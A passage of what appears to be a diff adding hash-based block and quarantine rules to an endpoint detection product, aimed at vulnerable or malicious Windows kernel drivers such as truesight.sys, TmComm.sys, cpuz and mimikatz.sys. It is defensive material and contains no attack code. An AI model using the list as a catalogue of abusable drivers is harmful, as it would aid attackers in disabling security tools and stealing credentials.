+ "id": "c05c8cac-7038-58de-84be-4d7787d7027b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826104Z",
+ "creation_date": "2026-03-23T11:45:30.826107Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826116Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aa30e85ea2288f721cbd2bc158aa616d0aac2f5695597e61179972581484324e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c05f1553-a658-5062-a37a-1285888edd5c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974229Z",
+ "creation_date": "2026-03-23T11:45:29.974231Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974237Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cf0855a8517be550b08a981bfacf90f245791cd70620868a241f1b1e2d8dfd89",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c05f71b9-73d9-5bc4-8e07-8b990c448a1f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481308Z",
+ "creation_date": "2026-03-23T11:45:30.481310Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481316Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cd57abaf2f20ea5b3f56db1193cb3772aa09bb2be3c4fa8001e7cf72ae1f078c",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c068b9b7-4ed1-5fb3-8ec2-abc81e31e000",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827647Z",
+ "creation_date": "2026-03-23T11:45:30.827649Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827654Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "00e6fc33ba9861f673f857c74e65d65e90702013705e5170f4680565956c02ee",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c06cc91d-e589-5365-b939-a66a40f21754",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616550Z",
+ "creation_date": "2026-03-23T11:45:29.616553Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616558Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ffc72f0bde21ba20aa97bee99d9e96870e5aa40cce9884e44c612757f939494f",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0716296-abc4-555e-a39a-5ba2e48fecdc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462143Z",
+ "creation_date": "2026-03-23T11:45:30.462146Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462155Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2c14bea0d85c9cad5c5f5c8d0e5442f6deb9e93fe3ad8ea5e8e147821c6f9304",
+ "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c077017e-28cb-5b91-9dab-85b0723adf9d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153175Z",
+ "creation_date": "2026-03-23T11:45:31.153178Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153186Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "22d4ebe019788d7d9a7ab2e9e6ad1693dc0ebf8388666aba2de97dd59ee4bf02",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c07a1478-e1be-5749-b54d-0e4e936500af",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815598Z",
+ "creation_date": "2026-03-23T11:45:31.815601Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815610Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9ae049742c126352ad859127676551110405bbcabec461d637d3998241017a0a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c07ac49f-338e-53bf-8fe7-9b3b031d3e26",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826920Z",
+ "creation_date": "2026-03-23T11:45:30.826922Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826928Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bb6710e984a8ce820b30f58ddd46c775b2b6136edcde493591ac4f3e48a9bc06",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0916b8a-50e2-50e9-bc14-3eb7359839ef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145395Z",
+ "creation_date": "2026-03-23T11:45:31.145397Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145402Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cb2597916344decf1afbdb771ab8d9ab3896be186f1fe20ef905273ed73e3629",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c09ea503-c0e2-521b-a260-cb89b4de2d21",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149371Z",
+ "creation_date": "2026-03-23T11:45:31.149373Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149380Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0a16b0c655899e6bda9c8ece578726f638bbed70ae9a5a3140e1a5338c012607",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0aad242-4b17-51b4-a2df-9d24c1ab726b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149981Z",
+ "creation_date": "2026-03-23T11:45:31.149983Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149989Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a2cf29afe28aafd0e1ccbae0658cd58afb461355e625f0469585a2a6def12ae5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0ac1726-04c6-5642-a4a3-85acd31ee339",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610776Z",
+ "creation_date": "2026-03-23T11:45:29.610778Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610784Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c50f8ab8538c557963252b702c1bd3cee4604b5fc2497705d2a6a3fd87e3cc26",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0ac5730-021b-5fae-9faa-937019673722",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473976Z",
+ "creation_date": "2026-03-23T11:45:30.473979Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473988Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5380daf2497ed35fc6d8b2a2f343dcbb95bb7384eea73781126a641ba3391af8",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0cc64d3-deff-5e43-a7bb-139aa90d9702",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606995Z",
+ "creation_date": "2026-03-23T11:45:29.606997Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607002Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a4859c5456d03f799de89d2f8cbb36b4518259a6c7c0bc909b1fd16f48363d5a",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0d04003-ef54-51cd-a08c-b1e2087513d7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475913Z",
+ "creation_date": "2026-03-23T11:45:31.475917Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475927Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d233b5fb67cafe05c29c6d97646bd398b7eec950d1375ee898f2ad6dbacb11c3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0d16b99-aff2-5688-a0f6-e0b3e6aa6fd6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819976Z",
+ "creation_date": "2026-03-23T11:45:30.819978Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819984Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "283a2e3eb9bad973e2ec439208f1bfb5121f8d9c37019b8a699be212f05964eb",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0d54b16-a6ef-5b19-adc6-79ae755d1515",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146510Z",
+ "creation_date": "2026-03-23T11:45:31.146512Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146518Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3b250c6e21e8393c8f707fef88d4f0afc6ad24cef8590d3f6b269bc75fc4185b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0d5bd27-7d43-551d-bd51-d19f9158fe72",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807483Z",
+ "creation_date": "2026-03-23T11:45:31.807486Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807491Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0aa450b1279a90d388466fb7b00a1663bb72d2e70efa1082044e23b18a5c62ae",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0db53d7-324e-59e9-ae5f-6aab7fea03a9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980289Z",
+ "creation_date": "2026-03-23T11:45:29.980291Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980296Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a66d2fb7ef7350ea74d4290c57fb62bc59c6ea93f759d4ca93c3febca7aeb512",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0e16a20-2f4b-5e41-9ae8-556b1f851306",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818794Z",
+ "creation_date": "2026-03-23T11:45:31.818797Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818805Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7b1437d1b7ea3e5b9be6c669db906b70ef958c6e1df62592a2e3ee43b210a3e0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0e9aa31-fe03-57d0-9b57-a9ca54d28c9f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149807Z",
+ "creation_date": "2026-03-23T11:45:31.149810Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149815Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1614e43c7556bcf6867d7c528ea7f7dc70a2bd90ef17ea35e85af1663a8b62d9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0ecc777-a616-59dd-a21d-6851e8f058ab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
